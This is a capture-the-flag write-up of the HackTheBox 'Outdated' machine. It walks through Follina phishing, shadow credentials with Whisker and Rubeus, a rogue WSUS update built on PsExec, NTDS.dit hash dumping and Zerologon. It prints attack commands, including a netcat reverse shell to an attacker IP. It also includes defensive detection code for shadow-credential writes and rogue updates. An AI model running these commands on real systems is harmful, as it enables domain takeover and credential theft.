2022-12-10 15:40:27 +00:00
# HackTheBox - Outdated
## NMAP
```bash
Nmap scan report for 10.10.11.175
Host is up (0.42s latency).
Not shown: 65519 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 02:03:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
|_SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|_ssl-date: 2022-08-14T02:06:34+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site does not have a title.
8531/tcp open unknown
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
54116/tcp open msrpc Microsoft Windows RPC
54125/tcp open msrpc Microsoft Windows RPC
```
### PORT 139/445 (SMB)
Checking for null authentication on SMB, we can list the shares
<img src="https://i.imgur.com/9O6XieM.png"/>
Checking the `Shares` directory, it has a PDF which we can transfer to our machine with `get`
<img src="https://i.imgur.com/KecIMt0.png"/>
<img src="https://i.imgur.com/8gmAtnW.png"/>
<img src="https://i.imgur.com/HLjRrRD.png"/>
The PDF talks about a breach on the servers, mentions emailing web application links to `itsupport@outdated.htb` through SMTP, and talks about patching the recent vulnerabilities
Now we can test for these CVEs, but only two of them have a high score, which makes them more critical than the others: `CVE-2022-30190`, dubbed `Follina`, and `CVE-2022-29130`, which is RCE through LDAP
## Foothold
### PORT 25 (SMTP)
On connecting to SMTP with `telnet`, we send an email to `itsupport@outdated.htb` with a link on which we'll get a hit
<img src="https://i.imgur.com/w19ohcV.png"/>
<img src="https://i.imgur.com/uCkaR5P.png"/>
### Testing for CVE-2022-30190 (Follina)
I tried testing for Follina with John Hammond's repository
https://github.com/JohnHammond/msdt-follina
Before running this we need to change the `Invoke-WebRequest` call, which downloads `nc64.exe` from GitHub, so that it fetches it from our machine instead
<img src="https://i.imgur.com/E5HP6Qg.png"/>
<img src="https://i.imgur.com/K49sX3z.png"/>
Now run the script, hosting the payload on port 80
<img src="https://i.imgur.com/KM0ECFY.png"/>
And send the url through email
<img src="https://i.imgur.com/MZXo0ME.png"/>
After getting a shell, I tried listing usernames with `net user` and also checking the groups `btables` is in, but that user doesn't exist
<img src="https://i.imgur.com/MC7F7v5.png"/>
But checking with `/domain`, it does
<img src="https://i.imgur.com/0IXdetf.png"/>
Which shows that this user is in `ITStaff` group
<img src="https://i.imgur.com/RtF7wLx.png"/>
So we are probably in some container, as the IP is different as well
<img src="https://i.imgur.com/3gWPjVY.png"/>
On running linpeas we can see wsus is vulnerable
<img src="https://i.imgur.com/jN6MzFy.png"/>
We can also see that there are some Kerberos tickets in the process
<img src="https://i.imgur.com/zC5NplY.png"/>
I tried using `sharpwsus` but couldn't proceed further as it wasn't able to inspect the wsus server
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
<img src="https://i.imgur.com/QvpqYSE.png"/>
So going back to AD enumeration, I used `sharphound` to dump the data and transferred it through `nc`
<img src="https://i.imgur.com/vJaiKmG.png"/>
<img src="https://i.imgur.com/HnVNmao.png"/>
Uploading the data on bloodhound
<img src="https://i.imgur.com/5OJzQEM.png"/>
The built-in queries didn't show a path to escalate for btables
<img src="https://i.imgur.com/UHh59Aq.png"/>
## Privilege Escalation (sflowers)
I wasted a lot of time here until I updated both bloodhound and neo4j to the latest version
https://linuxhint.com/install-neo4j-ubuntu/
Following this, I added the repository for neo4j 4.4, as the latest version of BloodHound needs that specific version; the latest build of SharpHound is also required
```bash
sudo curl -fsSL https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
sudo add-apt-repository "deb https://debian.neo4j.com stable 4.4"
```
<img src="https://i.imgur.com/dxxeGYU.png"/>
<img src="https://i.imgur.com/6fAMoyK.png"/>
When updating neo4j make sure to set this value to true
<img src="https://i.imgur.com/1iKLGxD.png"/>
Running the updated version of sharphound
https://github.com/BloodHoundAD/SharpHound
<img src="https://i.imgur.com/Ci8YjAD.png"/>
Now, after uploading the JSON files, we'll see a path to escalate from the btables user
<img src="https://i.imgur.com/V62pvuo.png"/>
We can see the abuse info for `AddKeyCredentialLink`, with which we can set shadow credentials for the `sflowers` user
<img src="https://i.imgur.com/rjduzZN.png"/>
<img src="https://i.imgur.com/APmFVvT.png"/>
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
This article explains the abuse of shadow credentials with `Whisker`
https://github.com/eladshamir/Whisker
For building the exe I used Visual Studio
<img src="https://i.imgur.com/IaMbOqX.png"/>
<img src="https://i.imgur.com/KFyhnaZ.png"/>
We can run this command to generate a certificate for the key credential; on completion it also prints the Rubeus command for getting sflowers' NTLM hash through PKINIT, which is Kerberos pre-authentication using a certificate
```bash
.\Whisker.exe add /target:sflowers /domain:outdated.htb /dc:dc.outdated.htb
```
<img src="https://i.imgur.com/tRcDD0d.png"/>
And with this command we can get the NTLM hash for sflowers
```powershell
Rubeus.exe asktgt /user:sflowers /certificate:"<generated certificate>" /password:"<generated certificate password>" /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
```
<img src="https://i.imgur.com/0I9qGV3.png"/>
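From the defender's side, the Whisker step above is a write to the target's `msDS-KeyCredentialLink` attribute by a different account, which shows up as Security Event ID 5136 (Directory Service Changes) when that audit policy is on. The following is an added example, not code from the writeup or from Whisker: it parses constructed 5136 records in a simplified key=value form and flags key additions where the writer is neither the object itself nor a hypothetical enrollment account (`svc_enroll` is an assumed allowlist entry).

```python
"""Flag msDS-KeyCredentialLink writes (shadow credentials) in Directory Service
Changes audit records (Security Event ID 5136), exported as key=value lines."""
import re

# Constructed sample records (simplified key=value form, not real log output).
# %%14674 is the 5136 OperationType code for "Value Added", %%14675 "Value Deleted".
SAMPLE_EVENTS = [
    "EventID=5136 SubjectUserName=sflowers ObjectDN=CN=sflowers,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674",
    "EventID=5136 SubjectUserName=btables ObjectDN=CN=sflowers,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674",
    "EventID=5136 SubjectUserName=btables ObjectDN=CN=btables,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=description OperationType=%%14674",
    "EventID=5136 SubjectUserName=btables ObjectDN=CN=sflowers,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14675",
]

# Assumption: accounts allowed to register keys on behalf of other principals
# (e.g. a device-registration service account); adjust for the environment.
ENROLLMENT_ALLOWLIST = {"svc_enroll"}

def parse_event(line):
    """Turn one key=value record into a dict (values contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def target_account(object_dn):
    """Account name from the leading CN= RDN of the modified object's DN."""
    match = re.match(r"CN=([^,]+)", object_dn, re.IGNORECASE)
    return match.group(1).lower() if match else ""

def is_shadow_credential_write(event):
    """True when a key credential was added to an object the writer does not own."""
    if event.get("EventID") != "5136":
        return False
    if event.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return False
    if event.get("OperationType") != "%%14674":  # additions only; removals are clean-up
        return False
    subject = event.get("SubjectUserName", "").lower()
    target = target_account(event.get("ObjectDN", ""))
    return subject != target and subject not in ENROLLMENT_ALLOWLIST

def find_suspicious(lines):
    """Return (writer, victim) pairs for every suspicious key credential write."""
    return [(e["SubjectUserName"], target_account(e["ObjectDN"]))
            for e in map(parse_event, lines) if is_shadow_credential_write(e)]

if __name__ == "__main__":
    for writer, victim in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: {writer} added a key credential to {victim}")
```

The corresponding mitigation is to review who holds write access to `msDS-KeyCredentialLink` on user objects, which is exactly the edge BloodHound surfaced here.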
Using pass the hash through `evil-winrm` we can log in
<img src="https://i.imgur.com/6xWtvHt.png"/>
Looking at the groups we are in `WSUS Administrators` group
<img src="https://i.imgur.com/PpyrH1C.png"/>
We can try running SharpWSUS again
<img src="https://i.imgur.com/foJ5dR1.png"/>
Now, what WSUS (Windows Server Update Services) actually is: it's a solution for deploying Windows updates to systems in a domain, where the hosts don't have to reach out to the internet for updates but get them internally instead
To abuse this we can create a malicious update using `PsExec`, since the update payload has to be a Microsoft-signed executable; PsExec is a signed Sysinternals binary, so it won't be flagged and we can execute anything through it
```powershell
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" net localgroup administrators sflowers /add\"" /title:"Updauwte"'
```
The reason I used cmd to execute the SharpWSUS command here is that it doesn't run properly from PowerShell and needs the quotes escaped
<img src="https://i.imgur.com/a5XVRWp.png"/>
Approving the update
```powershell
SharpWSUS.exe approve /updateid:d47b1ac0-b4f7-43ca-b21f-dfbcf0499697 /computername:dc.outdated.htb /groupname:"pleauswse"
```
<img src="https://i.imgur.com/7aOBlXs.png"/>
And then check the status to see whether the update has been installed
<img src="https://i.imgur.com/s8aoAaK.png"/>
Once the update is installed, which adds sflowers to the local Administrators group, we can verify it by checking which groups sflowers belongs to now
<img src="https://i.imgur.com/lw53NhQ.png"/>
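A WSUS administrator reviewing approvals can catch an update like the one created above from its metadata alone: there is no KB article behind the title, the payload is a signed LOLBin rather than an `.msu`/`.cab`, and the install arguments run a command. The following is an added example, not code from the writeup or from SharpWSUS; the record fields and the sample rows are constructed, and `svc_wsus`-style provenance is not modelled.

```python
"""Triage WSUS update metadata for the red flags of a rogue update of the kind
SharpWSUS creates: a Microsoft-signed LOLBin as payload, attacker-supplied
arguments, and no KB article behind the title."""
import os
import re

# Microsoft-signed binaries commonly wrapped as a fake update payload.
LOLBIN_PAYLOADS = {"psexec.exe", "psexec64.exe", "bginfo.exe", "bginfo64.exe"}
# Argument fragments that mean "run a command", not "install a patch".
CMD_PATTERN = re.compile(r"cmd(\.exe)?\s+/c|net\s+(localgroup|user)\b|nc(64)?\.exe", re.I)
KB_PATTERN = re.compile(r"\bKB\d{6,7}\b")

# Constructed sample records (fields modelled on an update approval; not real SUSDB rows).
SAMPLE_UPDATES = [
    {"title": "2022-08 Cumulative Update for Windows Server 2019 (KB5016623)",
     "kb": "KB5016623", "payload": "windows10.0-kb5016623-x64.msu", "args": ""},
    {"title": "Updauwte", "kb": "",
     "payload": r"C:\Users\sflowers\PsExec64.exe",
     "args": '-accepteula -s -d cmd.exe /c "net localgroup administrators sflowers /add"'},
    {"title": "Security Intelligence Update for Microsoft Defender Antivirus (KB2267602)",
     "kb": "KB2267602", "payload": "mpam-fe.exe", "args": ""},
]

def rogue_update_reasons(update):
    """Return the red flags found on one update record (empty list = looks normal)."""
    reasons = []
    if not update["kb"] and not KB_PATTERN.search(update["title"]):
        reasons.append("no KB article id")
    # Windows paths use backslashes; normalise so basename() works on any host.
    payload_name = os.path.basename(update["payload"].replace("\\", "/")).lower()
    if payload_name in LOLBIN_PAYLOADS:
        reasons.append("payload is a signed LOLBin")
    if CMD_PATTERN.search(update["args"]):
        reasons.append("command execution in arguments")
    return reasons

def triage(updates):
    """Map each suspicious update title to its list of red flags."""
    return {u["title"]: r for u in updates if (r := rogue_update_reasons(u))}

if __name__ == "__main__":
    for title, reasons in triage(SAMPLE_UPDATES).items():
        print(f"ROGUE? {title!r}: {', '.join(reasons)}")
```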
Being in the Administrators group on the domain controller, we can dump the SAM and NTDS.dit hashes
<img src="https://i.imgur.com/yz1WNiv.png"/>
Grabbing administrator's hash from NTDS.dit to perform pass the hash
<img src="https://i.imgur.com/zhN3MeJ.png"/>
We can also use any of the exec scripts from impacket
<img src="https://i.imgur.com/K84KUUI.png"/>
<img src="https://i.imgur.com/HXAc4gy.png"/>
Instead of adding the user to the Administrators group, we could have gotten a reverse shell through netcat as well
```powershell
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" C:\Users\sflowers\nc64.exe 10.10.14.52 2222 -e cmd.exe\"" /title:"Updauwte"'
```
<img src="https://i.imgur.com/xcD6VhM.png"/>
<img src="https://i.imgur.com/8a0jNfM.png"/>
<img src="https://i.imgur.com/wXwcU0A.png"/>
## Unintended
### Testing for CVE-2020-1472 (Zerologon)
This CVE is old, but it's still pretty common in AD; the machine was patched against the recent CVEs, but it may still be vulnerable to Zerologon
We can test whether the machine is vulnerable with a testing script for the CVE
https://github.com/SecuraBV/CVE-2020-1472
The script needs the NetBIOS name, which is the machine account name; we can get it with `enum4linux`
<img src="https://i.imgur.com/FUM2nP3.png"/>
<img src="https://i.imgur.com/4XdVhGY.png"/>
<img src="https://i.imgur.com/qt0M6fj.png"/>
Now that we know it's vulnerable we can exploit it with `-x`
<img src="https://i.imgur.com/XBOXSHC.png"/>
We can dump the NTDS.dit with the computer account which is `DC` with a blank password
<img src="https://i.imgur.com/sDXab57.png"/>
And can perform pass the hash to get a shell as Administrator
<img src="https://i.imgur.com/1tPzg74.png"/>
## References
- https://github.com/JohnHammond/msdt-follina
- https://github.com/rth0pper/zerologon
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://linuxhint.com/install-neo4j-ubuntu/
- https://github.com/BloodHoundAD/SharpHound
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
- https://github.com/eladshamir/Whisker
- https://securityonline.info/sharpwsus-csharp-tool-for-lateral-movement-through-wsus/
- https://labs.nettitude.com/blog/introducing-sharpwsus/